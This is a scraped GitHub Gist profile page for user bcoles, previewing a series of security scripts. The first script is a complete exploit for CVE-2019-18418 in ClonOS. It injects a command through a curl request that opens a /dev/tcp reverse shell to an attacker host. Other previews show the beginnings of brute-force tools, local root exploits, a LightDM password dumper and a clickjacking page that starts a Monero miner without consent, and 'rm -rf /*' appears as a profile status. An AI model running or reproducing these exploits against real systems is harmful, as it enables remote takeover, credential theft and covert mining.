bcoles
-
` rm -rf /* `
- ` rm -rf /* `
- Sign in to view email
- https://itsecuritysolutions.org
bcoles
/ clonos-root-rce.sh
Last active Nov 4, 2019
Trivial ClonOs remote root RCE exploit for CVE-2019-18418
View clonos-root-rce.sh
| #!/bin/bash | |
| # clonos-root-rce | |
| # Trivial ClonOs remote root RCE exploit for CVE-2019-18418 discovered by İbrahim Hakan Şeker | |
| # Note: Start netcat listener on LHOST:LPORT first | |
| RHOST="172.16.191.240" | |
| LHOST="172.16.191.165" | |
| LPORT=1337 | |
| curl "http://${RHOST}/json.php" -H "X-Requested-With: XMLHttpRequest" -d "mode=jailAdd&path=/&form_data[jname]=\`sudo /usr/local/bin/cbsd bash -c \"0<%26118-;exec 118<>/dev/tcp/${LHOST}/${LPORT};sh <%26118 >%26118 2>%26118\"\`" |
View jellyfin-brute.rb
| #!/usr/bin/env ruby | |
| ################################################################################ | |
| # Jellyfin Password Reset PIN Brute Force # | |
| # # | |
| # Usually completes within a few minutes. Tested on Jellyfin version 10.2.2. # | |
| # This will likely also work on Emby Media Server, but untested. # | |
| # # | |
| # Note: cURL must be installed and in $PATH # | |
| # # | |
| # Note: Upon successful expoitation, the password will be reset for all users, # |
bcoles
/ lightdmpwn.sh
Created Sep 19, 2018
Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358)
View lightdmpwn.sh
| #!/bin/bash | |
| # Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358) | |
| # --- | |
| # Usage: ./lightpwn | |
| # A LightDM session is required. Exploitation will lock the current session, | |
| # and could take several minutes. It usually takes about a minute. | |
| # When the screen stops flashing, unlock the session and run: /bin/subash | |
| # --- | |
| # There's nothing new or special about this exploit. | |
| # It's simply a slightly more weaponised version of the original PoC, |
bcoles
/ lastore-daemon-root.sh
Created Mar 24, 2018
Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
View lastore-daemon-root.sh
| #!/bin/bash | |
| # Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit | |
| # | |
| # The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user | |
| # in the sudo group to install arbitrary packages without providing a password, | |
| # resulting in code execution as root. By default, the first user created on | |
| # the system is a member of the sudo group. | |
| # ~ bcoles | |
| # | |
| # Based on exploit by King's Way: https://www.exploit-db.com/exploits/39433/ |
View lightdmdump
| #!/bin/bash | |
| # lightdmdump | |
| # --- | |
| # Dump clear text passwords from lightdm sessions on Ubuntu | |
| # Requires root privileges to dump lightdm process memory | |
| # Tested on Ubuntu 14.04.1 LTS and 16.04.4 LTS | |
| # --- | |
| # Bug discovered by: Sven Blumenstein | |
| # Disclosure date: 2017-09-15 | |
| # Source: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490 |
View crt.sh
| #!/bin/bash | |
| # List sub-domains using crt.sh | |
| set -euo pipefail | |
| IFS=$'\n\t' | |
| error() { | |
| echo "[ERROR] $*" | |
| exit 1 | |
| } |
View fuzz.rb
| #!/usr/bin/env ruby | |
| ################################################### | |
| # ----------------------------------------------- # | |
| # Fuzz Origami Ruby gem with mutated PDF files # | |
| # ----------------------------------------------- # | |
| # # | |
| # Each test case is written to 'fuzz.pdf' in the # | |
| # current working directory. # | |
| # # | |
| # Crashes and the associated backtrace are saved # |
bcoles
/ clickjack-authedmine.html
Created Oct 21, 2017
Start the AuthedMine JavaScript Monero miner without user consent (using clickjacking)
View clickjack-authedmine.html
| <html> | |
| <body> | |
| <div id="container" style="border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01"> | |
| <iframe style="position:absolute;border:0;width:5px;height:100px;top:-85px;cursor:pointer;" src="https://authedmine.com/media/miner.html?key=your_public_key"></iframe> | |
| </div> | |
| </body> | |
| <script> | |
| window.onmousemove = function(e) { | |
| var container = document.getElementById("container"); |
View cain-wifi-export-to-csv.rb
| #!/usr/bin/env ruby | |
| ################################################################################ | |
| # Cain Wireless Scanner export to CSV # | |
| # ----------------------------------- # | |
| # This script takes a text file of wireless networks exported from Cain # | |
| # and converts it to CSV. # | |
| ################################################################################ | |
| # ~ bcoles | |
| require 'csv' |
View brute-teamtalk.rb
| #!/usr/bin/env ruby | |
| ################################################################################ | |
| # BearWare TeamTalk login brute force # | |
| # # | |
| # Tested on TeamTalk versions 5.2.2.4885 and 5.2.3.4893 # | |
| # # | |
| # Note: SSL support is implemented but untested # | |
| ################################################################################ | |
| # ~ bcoles |
NewerOlder